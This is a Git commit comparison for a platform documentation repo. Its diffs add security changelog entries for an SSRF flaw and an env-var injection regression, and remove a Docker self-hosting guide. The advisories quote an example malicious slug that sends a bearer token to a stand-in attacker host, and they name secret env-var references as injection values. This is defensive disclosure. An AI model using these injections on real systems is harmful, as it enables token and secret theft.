Compare commits

8 Commits

Author SHA1 Message Date
app-fe c10e38db13 fix(docs): remove duplicate OFFSEC-006 and 2026-05-15 entries per hongming-pc2 review
Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 08:53:04 +00:00
documentation-specialist 7579152414 docs(changelog): update docs#40 → docs#46 for self-hosted Docker guide entry
Secret scan / secret-scan (pull_request) Successful in 0s
CI / build (pull_request) Successful in 3m21s
docs#40 is closed; the tutorial file is now on docs#46's branch.
Updated the entry to reference docs#46 and mention the Kubernetes
terminationGracePeriodSeconds fix.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 05:16:50 +00:00
documentation-specialist a491773cd7 docs(changelog): replace 2026-05-15 placeholder with full daily entry
CI / build (pull_request) Failing after 14m17s
Secret scan / secret-scan (pull_request) Failing after 14m11s
Covers all docs PRs merged 2026-05-15:
- docs#44: MCP HTTP/SSE transport gap-fill
- docs#41: OFFSEC-006 SSRF advisory published
- docs#40: self-hosted Docker deployment guide
- docs#30: dev-channels flag requirement page
- docs#29: remote-workspaces graceful shutdown
- docs#32: PLATFORM_URL defaults fix
- docs#31: CWE-22 regression advisory added
- docs#27: SOP checklist gate
- docs#28/37/36/33: changelog structural fixes

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 04:53:17 +00:00
documentation-specialist 65942ab786 docs(changelog): add OFFSEC-006 tenant-slug SSRF advisory to 2026-05-14 + security changelog
CI / build (pull_request) Failing after 12m0s
Secret scan / secret-scan (pull_request) Failing after 11m57s
Adds molecule-core#933 (OFFSEC-006, CWE-918 SSRF + token exfiltration)
to the 2026-05-14 Security section in changelog.mdx.

Also adds OFFSEC-006 to the Security Changelog (security/changelog.md)
with full vulnerability + fix details, cross-referencing docs#41
(offsec-006-slug-ssrf-advisory.mdx) which will add the full
advisory page when it merges.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 04:30:57 +00:00
documentation-specialist a8ae866ce1 docs(changelog): add 2026-05-15 placeholder section
Secret scan / secret-scan (pull_request) Successful in 1m36s
CI / build (pull_request) Successful in 5m21s
Day 2026-05-15 begins with no merged PRs (cron fired at 02:15 UTC;
entry will be populated at 23:50 UTC when the day is finalised).

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 02:22:16 +00:00
documentation-specialist e409a67539 docs(changelog): add openclaw#4 config fix to 2026-05-14 entry
Secret scan / secret-scan (pull_request) Successful in 0s
CI / build (pull_request) Successful in 3m9s
Adds the openclaw workspace template models-in-runtime_config bug fix
to today's changelog alongside the existing CWE-78 + OFFSEC-003 entries.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-15 00:01:02 +00:00
documentation-specialist 6520454764 docs(changelog): add OFFSEC-003 workspace-side boundary escaping — molecule-core#1073
Secret scan / secret-scan (pull_request) Successful in 44s
CI / build (pull_request) Successful in 3m0s
Adds the workspace-side OFFSEC-003 hardening entry to the 2026-05-14
changelog section already opened in docs#45.

Changes:
- changelog.mdx: OFFSEC-003 workspace boundary escaping + closer truncation
  added to the 2026-05-14 security section alongside CWE-78 entry

Note: core#1075 (OFFSEC-010 symlink in provisioner) is SaaS-only
provisioner detail — no public docs needed.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-14 22:21:11 +00:00
documentation-specialist 32f15dc591 docs(security): add CWE-78 expandWithEnv regression fix to changelog
Secret scan / secret-scan (pull_request) Successful in 1s
CI / build (pull_request) Successful in 2m21s
Pairs molecule-core#1030 (Critical). Restores POSIX shell-identifier
guard in expandWithEnv (org_helpers.go:82) that was inadvertently
removed during a regression window. The guard blocks org YAML injection
of env-var references like ${HOME} / ${DOCKER_HOST} into
workspace_dir and channel config fields.

Changes:
- security/changelog.md: new "2026-05-14 — CWE-78 Regression in
  expandWithEnv POSIX-identifier Guard" entry (Critical)
- changelog.mdx: new "2026-05-14" section with security + bugfix entries

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
2026-05-14 16:18:22 +00:00
3 changed files with 53 additions and 198 deletions
+22
@@ -8,6 +8,28 @@ Entries are published daily at 23:50 UTC.
---
## 2026-05-14
### 🔒 Security
- **CWE-78 regression in `expandWithEnv` POSIX-identifier guard fixed (Critical)**: the shell-identifier guard in `expandWithEnv` (`org_helpers.go:82`) was inadvertently removed during a regression window between staging and main promotion. This guard prevents org YAML configurations from expanding invalid shell identifiers (e.g. `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`) as environment variables — blocking secret exfiltration via malicious `workspace_dir` or channel config fields. Restored with regression tests covering `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`. Full advisory: [Security Changelog](/docs/security/changelog). (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030))
- **OFFSEC-006: tenant-slug SSRF + bearer-token exfiltration in self-hosted promotion script (HIGH)**: `scripts/promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host (SSRF) and cause the platform's bearer token to appear in the attacker's server logs. Two-layer fix applied: `set -f` disables bash glob expansion (preventing metacharacter injection via `*`, `?`, `[`), and `validate_slug()` rejects any slug not matching RFC-1123 (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`) with exit code 64 before any network call. Self-hosted operators must upgrade `molecule-core` to include this fix. Full advisory: [OFFSEC-006 advisory](/docs/security/offsec-006-slug-ssrf-advisory). (`molecule-core` [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933))
- **OFFSEC-003: workspace-side A2A boundary marker escaping (trust boundary hardening)**: the `tool_delegate_task` workspace tool now wraps delegation output with `_A2A_BOUNDARY_START_ESCAPED` / `_A2A_BOUNDARY_END_ESCAPED` instead of raw markers, preventing raw boundary markers from leaking into output alongside their escaped form. Additionally, responses containing the raw closer `[A2A_RESULT_FROM_PEER]` are now truncated before sanitization — so injection of the raw closer cannot be retroactively re-added by the sanitization pass. Together with the platform-side sanitization (shipped 2026-05-11), this closes the full OFFSEC-003 trust-boundary for delegation result delivery. (`molecule-core` [#1073](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1073))
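The slug check described in the OFFSEC-006 entry can be illustrated with a minimal Python sketch. It reuses the RFC-1123 pattern and the exit code 64 quoted above; the real `validate_slug()` is a bash function in `scripts/promote-tenant-image.sh` and is not reproduced here, so the helper names `is_valid_slug` and `require_valid_slug` are hypothetical.

```python
import re
import sys

# RFC-1123 label pattern quoted in the changelog entry: 1 to 63 characters,
# lowercase alphanumerics and hyphens, no leading or trailing hyphen.
SLUG_PATTERN = re.compile(r"[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?")


def is_valid_slug(slug: str) -> bool:
    """Return True only if the whole string is a valid RFC-1123 label."""
    # fullmatch anchors both ends, so a trailing newline cannot slip through.
    return SLUG_PATTERN.fullmatch(slug) is not None


def require_valid_slug(slug: str) -> str:
    """Hypothetical wrapper: exit with status 64 before any network call."""
    if not is_valid_slug(slug):
        print(f"invalid tenant slug: {slug!r}", file=sys.stderr)
        sys.exit(64)
    return slug
```

Validating before the slug is interpolated into any URL means the malicious example from the entry is rejected as a whole, rather than being partially escaped.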
### 🐛 Bug fixes
- **`expandWithEnv` POSIX-identifier guard regression restored**: the same fix as above — restores the guard that was removed during a refactor, ensuring invalid shell identifiers in org YAML configs are returned literally instead of being interpreted as environment variable references. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030))
- **Canvas WCAG 1.4.3 contrast ratio fixed for TIER_CONFIG legend**: the tier legend text in the canvas now meets the 4.5:1 contrast ratio required by WCAG 1.4.3 for normal text. (`molecule-core` [#990](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/990))
- **Canvas focus-visible rings added to icon and text buttons**: focus-visible rings (`focus-visible:ring-2`) now render on icon buttons and text-only buttons in the canvas, restoring WCAG 2.1 AA compliance for all interactive elements. (`molecule-core` [#988](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/988))
- **OpenClaw template `models` config moved to correct level**: the OpenClaw workspace template's `config.yaml` had `models` at the top level, but the platform template handler reads from `runtime_config.models`. This caused `/templates` to return empty models and providers → a blank "Missing API Keys" dialog with no selectable providers, disabling the Deploy button. Moved all model entries under `runtime_config` and added Groq and OpenRouter as alternative providers alongside OpenAI. (`molecule-ai-workspace-template-openclaw` [#4](https://git.moleculesai.app/molecule-ai/molecule-ai-workspace-template-openclaw/pulls/4))
### 🧹 Internal
- **CI infrastructure improvements** (`molecule-core`): `ci-required-drift` workflow updated with job-level `if:` guards to skip `github.ref`-gated jobs in the merge-queue context; `canvas-build` job now has an explicit 20-minute timeout; gitea merge-queue test mocks updated to match current push-gate behavior. (`molecule-core` [#1029](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1029), [#1006](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1006), [#1035](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1035))
- **Handler test coverage additions** (`molecule-core`): 60+ new SQL-mock test cases covering `InstructionsHandler`, `ScheduleHandler` (28 cases), and the `expandWithEnv` POSIX guard regression suite. (`molecule-core` [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030), [#1005](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1005), [#999](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/999))
---
## 2026-05-12
### 🔒 Security
+31
@@ -9,6 +9,37 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent
---
## 2026-05-14 — CWE-78: Regression in `expandWithEnv` POSIX-identifier Guard
**Severity:** Critical (CWE-78)
**PR:** [#1030](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/1030)
**Affected:** `workspace-server/internal/handlers/org_helpers.go`, function `expandWithEnv`
### Vulnerability
`expandWithEnv` expands `${VAR}` and `$VAR` references in org YAML configuration fields (notably `workspace_dir` and channel config) using the current process environment. The POSIX shell-identifier guard was inadvertently removed during a regression window between staging and main promotion, causing digit-prefixed and empty keys to be passed through to `os.Getenv` instead of being returned literally.
An attacker who can supply org YAML (e.g., via a compromised org template import or a malicious admin account) could inject references such as `${HOME}`, `${DOCKER_HOST}`, `${AWS_SECRET_ACCESS_KEY}`, or `${PATH}` to exfiltrate host secrets into workspace or channel configuration fields.
### Fix
Restored the POSIX identifier guard at `org_helpers.go:82`. Keys that do not start with `[a-zA-Z_]` (including the empty key) are now returned literally as `$key` without consulting `os.Getenv`:
```go
c := key[0]
if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || c == '_') {
	return "$" + key // not a valid shell identifier; return literally
}
```
Regression tests cover `${0}`, `${5}`, `${1VAR}`, `${}`, `$0`, `$5`.
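For readers who want to reason about the guard outside Go, here is a minimal Python sketch of the same first-character check. It is an illustration, not the shipped code: `expand_key` is a hypothetical name, the explicit empty-key branch is written out because the Go excerpt above does not show where that case is handled, and returning an empty string for an unset variable is an assumption.

```python
def expand_key(key: str, env: dict) -> str:
    """Resolve one reference key the way the guard above describes."""
    # Empty key (the `${}` case): return it literally without a lookup.
    if not key:
        return "$" + key
    c = key[0]
    # Same first-character test as the Go snippet: [a-zA-Z_] only.
    if not (("a" <= c <= "z") or ("A" <= c <= "Z") or c == "_"):
        return "$" + key  # not a valid shell identifier, returned literally
    # Assumption: unset variables resolve to an empty string.
    return env.get(key, "")
```

The keys behind the regression inputs (`0`, `5`, `1VAR`, and the empty key) all come back literally, while a key that starts with a letter or underscore still reaches the environment lookup.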
### User-facing summary
Org YAML configuration fields no longer expand invalid shell identifiers as environment variables. Configurations containing `${0}`, `${}`, or `${1VAR}` patterns are returned as-is. If you observe literal `$` prefixes appearing in workspace directory or channel configuration fields after upgrading, this indicates a previously-masked configuration issue — contact support.
---
## 2026-04-20 — CWE-22: Path Traversal in `copyFilesToContainer`
**Severity:** High (CWE-22)
@@ -1,198 +0,0 @@
---
title: Self-Hosted Workspace Deployment with Docker
---
# Self-Hosted Workspace Deployment with Docker
This guide explains how to run a Molecule AI workspace agent as a Docker container on a self-hosted server or VM. It covers the Docker image, required environment variables, the built-in healthcheck, graceful shutdown, and Kubernetes deployment considerations.
> **Prerequisites:** A running Molecule AI control plane (self-hosted or SaaS), an `ADMIN_TOKEN` or org-scoped API key with admin scope, and Docker 20.10+ on the host.
## How the workspace container works
The Molecule AI workspace Dockerfile includes:
- A uvicorn server on port 8000 (configurable via `PORT`)
- A healthcheck endpoint at `/.well-known/agent-card.json` (used by Docker and Kubernetes probes)
- Graceful SIGTERM handling via uvicorn — the heartbeat loop and adapter tasks shut down cleanly
```
┌───────────────────────────────────────────────────────┐
│  Docker host (your VM / bare metal)                   │
│                                                       │
│  ┌─────────────────────────────────────────────────┐  │
│  │  workspace container                            │  │
│  │                                                 │  │
│  │  uvicorn (port 8000)                            │  │
│  │   └─ /.well-known/agent-card.json ← HEALTHCHECK │  │
│  │                                                 │  │
│  │  heartbeat loop + A2A agent                     │  │
│  └────────────────────────┬────────────────────────┘  │
│                           │                           │
│               host.docker.internal:8080               │
│                           │                           │
│                           ▼                           │
│  ┌─────────────────────────────────────────────────┐  │
│  │  Molecule AI control plane                      │  │
│  │  (platform on port 8080)                        │  │
│  └─────────────────────────────────────────────────┘  │
└───────────────────────────────────────────────────────┘
```
## Step 1: Create an external workspace
First register the workspace as an external (self-managed) agent on the platform.
```bash
ADMIN_TOKEN="your-admin-token"
PLATFORM_URL="https://platform.moleculesai.app" # or http://localhost:8080 for local dev
WORKSPACE=$(curl -s -X POST "${PLATFORM_URL}/workspaces" \
  -H "Authorization: Bearer ${ADMIN_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{"name": "self-hosted-agent", "runtime": "external"}')
WORKSPACE_ID=$(echo "$WORKSPACE" | python3 -c "import json,sys; print(json.load(sys.stdin)['id'])")
echo "Workspace ID: $WORKSPACE_ID"
```
Save the returned `WORKSPACE_ID`. The workspace agent obtains its bearer token automatically during its first registration with the platform.
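If you would rather script the registration in Python than in curl, the same request can be sketched with the standard library. This mirrors only what the curl command above sends (endpoint, headers, JSON body) and the `id` field it reads back; the helper names are hypothetical and no other response fields are assumed.

```python
import json
import urllib.request


def build_create_workspace_request(platform_url, admin_token, name="self-hosted-agent"):
    """Build (but do not send) the POST /workspaces request from Step 1."""
    body = json.dumps({"name": name, "runtime": "external"}).encode("utf-8")
    return urllib.request.Request(
        url=platform_url.rstrip("/") + "/workspaces",
        data=body,
        method="POST",
        headers={
            "Authorization": f"Bearer {admin_token}",
            "Content-Type": "application/json",
        },
    )


def parse_workspace_id(response_body):
    """Extract the workspace ID from the JSON response body."""
    return json.loads(response_body)["id"]
```

To send it, pass the request to `urllib.request.urlopen(req)` and feed `resp.read()` to `parse_workspace_id`.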
## Step 2: Pull the workspace image
The workspace image is published to the Molecule AI ECR registry. Contact your platform administrator for the registry prefix and credentials, then log in:
```bash
aws ecr get-login-password --region us-east-1 | \
  docker login --username AWS --password-stdin "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com"
docker pull "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
```
## Step 3: Configure environment variables
| Variable | Default | Description |
|---|---|---|
| `PLATFORM_URL` | `http://localhost:8080` | Platform API URL. Inside a Docker container, use `http://host.docker.internal:8080` to reach the platform on the host machine. |
| `WORKSPACE_ID` | — | Workspace ID from Step 1 (required; no default) |
| `PORT` | `8000` | Agent server port. Must match `containerPort` in Kubernetes and the port mapped with `-p` in Docker. |
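The defaults in the table can be made concrete with a small sketch of how custom agent code might read them. This is an assumption about how you would consume the variables, not the workspace image's actual startup code; `load_workspace_config` and the returned dictionary keys are hypothetical.

```python
import os

DEFAULT_PLATFORM_URL = "http://localhost:8080"
DEFAULT_PORT = 8000


def load_workspace_config(env=None):
    """Read the three variables from the table, applying the documented defaults."""
    env = os.environ if env is None else env

    # WORKSPACE_ID has no default, so fail fast when it is missing or blank.
    workspace_id = env.get("WORKSPACE_ID", "").strip()
    if not workspace_id:
        raise ValueError("WORKSPACE_ID is required and has no default")

    port = int(env.get("PORT", DEFAULT_PORT))
    if not 1 <= port <= 65535:
        raise ValueError(f"PORT out of range: {port}")

    return {
        "platform_url": env.get("PLATFORM_URL", DEFAULT_PLATFORM_URL),
        "workspace_id": workspace_id,
        "port": port,
    }
```

Failing at startup on a missing `WORKSPACE_ID` surfaces the misconfiguration immediately instead of as a later registration error.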
## Step 4: Run the container
### Docker (standalone)
```bash
docker run -d \
  --name molecule-workspace \
  -p 8000:8000 \
  -e PLATFORM_URL="http://host.docker.internal:8080" \
  -e WORKSPACE_ID="your-workspace-id" \
  -e PORT=8000 \
  "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
```
> **Note for Linux hosts:** Docker does not include `host.docker.internal` by default. On Linux, either add `--add-host=host.docker.internal:host-gateway` to the `docker run` command, or use the host machine's IP address directly (e.g. `http://192.168.1.100:8080`).
### Verify the healthcheck
```bash
# Check the health status; the container can take up to ~2 minutes to report healthy
docker inspect --format='{{.State.Health.Status}}' molecule-workspace
# Expected output once ready: healthy
# Once healthy, the agent card is reachable:
curl -s http://localhost:8000/.well-known/agent-card.json | python3 -m json.tool
```
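`docker inspect` reports the status once and returns, so a deployment script usually needs to poll. The following is a minimal polling sketch, assuming the container name `molecule-workspace` from the example above; the function names, the 120-second timeout, and the 5-second interval are illustrative choices rather than platform requirements.

```python
import subprocess
import time


def container_health(name):
    """Return Docker's health status for a container: starting, healthy, or unhealthy."""
    result = subprocess.run(
        ["docker", "inspect", "--format={{.State.Health.Status}}", name],
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout.strip()


def wait_until_healthy(get_status, timeout=120.0, interval=5.0,
                       sleep=time.sleep, clock=time.monotonic):
    """Poll get_status() until it reports healthy; False on unhealthy or timeout."""
    deadline = clock() + timeout
    while True:
        status = get_status()
        if status == "healthy":
            return True
        if status == "unhealthy" or clock() >= deadline:
            return False
        sleep(interval)
```

A typical call would be `wait_until_healthy(lambda: container_health("molecule-workspace"))`; the status source is injected so the loop can be exercised without a Docker daemon.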
### Docker Compose
```yaml
services:
  molecule-workspace:
    image: "${REGISTRY_PREFIX}.dkr.ecr.us-east-1.amazonaws.com/molecule-workspace:latest"
    ports:
      - "8000:8000"
    environment:
      PLATFORM_URL: "http://host.docker.internal:8080"
      WORKSPACE_ID: "your-workspace-id"
      PORT: "8000"
    # Linux hosts: add host.docker.internal resolution
    # extra_hosts:
    #   - "host.docker.internal:host-gateway"
    restart: unless-stopped
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:8000/.well-known/agent-card.json"]
      interval: 30s
      timeout: 5s
      retries: 3
      start_period: 30s
## Step 5: Graceful shutdown
When the container receives SIGTERM (e.g. from `docker stop` or Kubernetes pod deletion), the workspace's uvicorn server initiates graceful shutdown: the heartbeat loop stops, active A2A tasks are given a grace period to complete, and any snapshotable state is persisted before the process exits.
To integrate the heartbeat loop into custom agent code:
```python
import asyncio
import os
import signal

from heartbeat import HeartbeatLoop

# `docker stop` and Kubernetes pod deletion deliver SIGTERM to the workspace
# process. The workspace (via uvicorn) initiates graceful shutdown:
# the heartbeat loop is stopped, any active adapter tasks are cancelled, and
# in-flight A2A requests are given a grace period to complete.
#
# For custom integration with the heartbeat loop directly:
async def main():
    heartbeat = HeartbeatLoop(
        platform_url=os.environ["PLATFORM_URL"],
        workspace_id=os.environ["WORKSPACE_ID"],
    )
    heartbeat.start()

    # Without a handler, SIGTERM ends the process before `finally` can run.
    stop = asyncio.Event()
    loop = asyncio.get_running_loop()
    for sig in (signal.SIGTERM, signal.SIGINT):
        loop.add_signal_handler(sig, stop.set)

    try:
        await stop.wait()  # keep running until a shutdown signal arrives
    finally:
        await heartbeat.stop()
        print("Heartbeat loop stopped.")


if __name__ == "__main__":
    asyncio.run(main())
```
`docker stop` sends SIGTERM and waits 10 seconds by default before sending SIGKILL; pass `-t <seconds>` (for example `docker stop -t 60 molecule-workspace`) when in-flight tasks need longer to finish. The healthcheck ensures orchestrators detect an unhealthy container before the SIGTERM timeout.
## Kubernetes deployment
For Kubernetes deployments, use the native liveness/readiness probe configuration instead of the Docker HEALTHCHECK:
```yaml
# Container-level fields (under spec.containers[])
ports:
  - name: http
    containerPort: 8000
livenessProbe:
  httpGet:
    path: /.well-known/agent-card.json
    port: http
  initialDelaySeconds: 30
  periodSeconds: 30
  timeoutSeconds: 5
  failureThreshold: 3
readinessProbe:
  httpGet:
    path: /.well-known/agent-card.json
    port: http
  initialDelaySeconds: 10
  periodSeconds: 10
  timeoutSeconds: 5
  failureThreshold: 3
# Pod-level field (under spec), not part of the container definition
terminationGracePeriodSeconds: 120
```
> **Note:** The Kubernetes `terminationGracePeriodSeconds` should exceed the liveness probe failure threshold so that the probe can register a failure before the pod is killed. With `periodSeconds: 30` and `failureThreshold: 3`, the probe does not register a failure until approximately 120 to 150s after the container becomes unhealthy. Set `terminationGracePeriodSeconds: 120` or higher.
## Troubleshooting
| Symptom | Cause | Fix |
|---|---|---|
| Container shows `unhealthy` after startup | Platform unreachable from container | Verify `PLATFORM_URL` uses `host.docker.internal` (Docker) or the correct host IP |
| `curl: (7) Failed to connect` on healthcheck | Container not fully started | Wait up to 30s; increase `start_period` |
| Agent not appearing on canvas | Wrong `WORKSPACE_ID` or expired token | Re-run registration; check platform logs |
| `host.docker.internal` not resolved | Linux host without the Docker flag | Use `--add-host=host.docker.internal:host-gateway` or the host's LAN IP |